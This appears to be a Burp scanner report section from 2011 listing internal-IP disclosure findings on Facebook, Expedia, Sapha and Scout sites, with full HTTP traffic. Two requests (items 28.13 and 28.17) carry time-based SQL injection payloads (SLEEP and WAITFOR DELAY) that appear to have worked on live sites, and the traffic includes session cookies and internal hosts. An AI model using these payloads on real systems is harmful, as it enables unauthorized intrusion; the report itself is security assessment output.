28.7. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FStad_Amsterdam_Visits_Curacao_in_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FAquasports_Challenge_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FSecurity_Ashore_and_At_Sea%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FSwashbuckling_Sint_Eustatius%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FDiana_Nyad_Plans_Swim_from_Cuba_to_Florida%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2F2012_Olympic_Bid_by_Virgin_Islands_John_and_Johnny_Foster%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FProfile_Puerto_Rican_Jaime_Torres%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FWhat_is_in_a_Name%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FWhat_to_Do_About_Boat_Pox%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FAnchoring_for_Dummies%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FDown_with_Sea_Gypsies%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FYacht_Club_News_May_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FCaribbean_News_May_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FMega_Yacht_Turned_into_Traveling_Art_Gallery%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FBesenzoni_Expands_Customer_Service_in_US_and_Mexico_With_30_stations%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FWorld_ARC_Circumnavigation_Rally_Goes_Annual%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FStore_Bay_Marine_Services_Now_Offering_Bunkering_Provisioning_and_Shore_Support_for_Yachts%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FUp-N-Out_Creates_New_Wide_Step_Version_Of_Popular_Compact_Dinghy_Ladder%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FNational_Marine_Suppliers_Opens_NEW_Flagship_Store_in_St_Maarten%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FMarine_Travelift_Products_Gain_NEW_Exposure_in_South_America%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FSauter_Carbon_Offset_Design_presents_the_GREEN_Ark_Angel_Life_Support_Vessel%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FKeep_Furling_with_a_Navtec_Anti_Torsion_Stay%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FNew_England_Ropes_Introduces_Endura_Braid_Classic%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FSailors_in_the_News_2011_Jeffrey_Chen%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FBoats_and_Batiks_the_World_of_Lilo_Nido%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FRemarkable_Rural_and_Round_Marie_Galante%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FJulian_Putley_Pay_Tribute_to_Thomas_John_Kershaw%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FA_Fresh_Start_for_Grand_Cayman_Island_in_2011%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Cruising
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:12:16 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.22.119
X-Cnection: close
Date: Fri, 06 May 2011 21:10:16 GMT
Content-Length: 9573

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/May_2011\/Stad_Amsterdam_Visits_Curacao_in_2011","normalized_url":"http:\/\/www.allatsea.net\/article\/May_2011\/Stad_Amsterdam_Visits_C
...[SNIP]...
28.8. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FThe_Hemingway-Lerner_Trophy_Unveiled_for_Upcoming_First_Annual_Billfish_Invitational_in_Bimini%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Deep_Sea_Fishing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:12:09 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.59.108
X-Cnection: close
Date: Fri, 06 May 2011 21:10:09 GMT
Content-Length: 457

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/May_2011\/The_Hemingway-Lerner_Trophy_Unveiled_for_Upcoming_First_Annual_Billfish_Invitational_in_Bimini","normalized_url":"http:\/\/www
...[SNIP]...
28.9. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FDay_Five_Race_Report_Antigua_Sailing_Week_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FWest_End_Yacht_Club_announces_NEW_Racing_Series_with_Goslings_as_the_Sponsor%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2F9th_Annual_Anguilla_Regatta_Kicks_Off_in_Road_Bay_on_May_6_%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FParty_Time_at_Antigua_Sailing_Week_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FBig_Breeze_and_Lumpy_Seas_Spiced_Up_the_Action_at_Antigua_Sailing_Week_2011_%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FReichel_Pugh_75_Titan_Badly_Damaged_by_Fire_in_Antigua%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FScintillating_Sailing_in_Glorious_Sunshine_on_Day_Two_of_Antigua_Sailing_Week%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FDay_One_Report_from_the_44th_Antigua_Sailing_Week%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FEntry_List_Finalized_for_the_Transatlantic_Race_2011_%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FHotting_Up_in_Antigua_for_Antigua_Sailing_Week_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FMark_Plaxton_Wins_Virgin_Queen_Pizza_Pursuit_Race%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FVirago_Wins_16th_Annual_St_Barth_Bucket%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FSuperyachts_Make_Debut_in_North_Sound_Regatta_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FGill_Commodores_Cup_and_Budget_Marine_Match_Racing_Cup_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FCaribbean_Sailors_Shine_at_St_Maarten_Heineken_Regatta_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FIntl_Rolex_Regatta_2011_Attracts_Best_Sailors%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FPuerto_Rico_Heineken_Intl_Regatta_and_Intl_Dinghy_Regatta_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FDates_Set_from_2_to_7_April_for_Les_Voiles_de_Saint_Barth_2012%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FJust_Over_a_Week_to_Go_until_Antigua_Sailing_Week_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FSecond_Edition_a_Wrap_at_Les_Voiles_de_St_Barth_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FDown_to_the_Wire_at_Les_Voiles_de_St_Barth_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FAround_the_Other_Way_at_Les_Voiles_de_St_Barth_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FTime_Out_at_Les_Voiles_de_St_Barth_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FDeja_vu_all_over_again_at_Les_Voiles_de_St_Barth_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FMaxi_Priest_to_perform_live_at_Antigua_Sailing_Week_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2F25_Knot_Winds_Blast_Off_the_Start_of_Les_Voiles_de_St_Barth_2011%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FBuild_It_and_They_Will_Come_to_Les_Voiles_de_St_Barth_2011_%22%2C%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FApril_2011%2FTies_Broken_and_Winners_Named_in_2011_Cape_Air_Caribbean_Ocean_Racing_Circuit%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Sailing_Regatta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:12:16 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.75.128
X-Cnection: close
Date: Fri, 06 May 2011 21:10:16 GMT
Content-Length: 10310

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/May_2011\/Day_Five_Race_Report_Antigua_Sailing_Week_2011","normalized_url":"http:\/\/www.allatsea.net\/article\/May_2011\/Day_Five_Race_
...[SNIP]...
28.10. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FNews_from_Errol_Flynn_Marina_May_2011%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Cruising
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:12:08 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.60.118
X-Cnection: close
Date: Fri, 06 May 2011 21:10:08 GMT
Content-Length: 343

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/May_2011\/News_from_Errol_Flynn_Marina_May_2011","normalized_url":"http:\/\/www.allatsea.net\/article\/May_2011\/News_from_Errol_Flynn_M
...[SNIP]...
28.11. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FClub_Swan_42_Arethusa_Wins_Swan_Caribbean_Challenge_at_Antigua_Sailing_Week_2011%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Sailing_Regatta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:12:08 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.62.102
X-Cnection: close
Date: Fri, 06 May 2011 21:10:08 GMT
Content-Length: 429

fb_sharepro_render([{"url":"http:\/\/www.allatsea.net\/article\/May_2011\/Club_Swan_42_Arethusa_Wins_Swan_Caribbean_Challenge_at_Antigua_Sailing_Week_2011","normalized_url":"http:\/\/www.allatsea.net\
...[SNIP]...
28.12. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "9cf5784c431fd8473c013bf44981ead3"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "fee33a4872a77ed93a2b9cd06a0ab196"
X-FB-Server: 10.27.85.119
X-Cnection: close
Cache-Control: public, max-age=287
Expires: Sat, 07 May 2011 11:29:47 GMT
Date: Sat, 07 May 2011 11:25:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 117993

/*1304766587,169563511,JIT Construction: v375286,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...
28.13. http://dce.sapha.com/engine.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /engine.php?ac=-111'%20OR%20SLEEP(25)=0%20LIMIT%201-- HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 412

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0
...[SNIP]...
28.14. http://media.expedia.com/ads/travelhook/travelhook.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.expedia.com
Path:   /ads/travelhook/travelhook.js

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /ads/travelhook/travelhook.js HTTP/1.1
Host: media.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188

Response

HTTP/1.1 200 OK
ntCoent-Length: 27105
Content-Type: application/x-javascript
Last-Modified: Fri, 04 Mar 2011 19:46:42 GMT
Accept-Ranges: bytes
ETag: "03d84e2a4dacb1:0"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=900
Date: Fri, 06 May 2011 22:36:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 27105

try
{

var th_StaticStart = new Date();
var thsver = '6.58';
var thsrn = Math.floor(Math.random() * 1000000);
var th_domain = 'extras.expedia.com';

function getEndvrTUID()
{

...[SNIP]...
   Pages["HTX_LOGIN"] = th_domain + "/Offers/js/LoginScrape.js?thsads=false";

}

       // Sams Club
if (document.URL.indexOf("travel.samsclub.com") >= 0 ||
document.URL.indexOf("10.95.13.23") >
...[SNIP]...
&pn=Confirmation";    
       Pages["HTX_ITNHEAD_STD"] = th_domain + "/Delivery/scrape.aspx?cid=1&pn=TripItinerary";    
    }
    else if (document.URL.indexOf("aarp") >= 0 ||
    document.URL.indexOf("10.96.73.221") >
...[SNIP]...
28.15. http://nba.scout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nba.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: nba.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.2.9.1304728228796

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:30:41 GMT
Content-Type: text/html
Content-Location: http://nba.scout.com/StaticPages/nba/index.html
Last-Modified: Fri, 06 May 2011 17:43:32 GMT
Accept-Ranges: bytes
ETag: "ec70541e15ccc1:68c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
Vary: Accept-Encoding
Content-Length: 25838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>NBA Team Directory Front Page</title>
<meta http-equiv="Con
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=244&p=1&noredir=1&fromprefetch=1
By:
Date: Fri May 6 10:43:32 PDT 2011
-->
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 10:43:33 AM
URL: http://192.168.10.106:80/Legacy/a.z?s=244&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.63, CEDAR
Page Execution Time: 87 ms
-->
...[SNIP]...
28.16. http://recruiting.scout.com/Legacy/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /Legacy/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Legacy/a.z?s=143&p=26&cfg=22&fromprefetch=1 HTTP/1.1
Host: recruiting.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utmz=153805115.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=153805115.1232119317.1303509265.1303509265.1303516031.2; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304731683.1304736111.6; __utmc=202704078; __utmb=202704078.1.10.1304736111

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 21:42:14 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 21:52:13 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 12091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 2:42:13 PM
URL: http://recruiting.scout.com:80/Legacy/a.z?s=143&p=26&cfg=22&fromprefetch=1
Server IP: 192.168.20.93, SCOUTWEB1
Page Execution Time: 24 ms
-->
...[SNIP]...
28.17. http://recruiting.scout.com/Legacy/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /Legacy/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Legacy/a.z?s=143&p=26&cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1 HTTP/1.1
Host: recruiting.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utmz=153805115.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=153805115.1232119317.1303509265.1303509265.1303516031.2; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304728142.1304731683.5; __utmc=202704078

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 21:42:15 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 21:51:50 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 11994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 2:42:15 PM
URL: http://recruiting.scout.com:80/Legacy/a.z?s=143&p=26&cfg='%3bWAITFOR+DELAY+'0%3a0%3a25'--&fromprefetch=1
Server IP: 192.168.20.68, SCOUTWEB9
Page Execution Time: 25,041 ms
-->
...[SNIP]...
28.18. http://scouthoops.scout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scouthoops.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: scouthoops.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
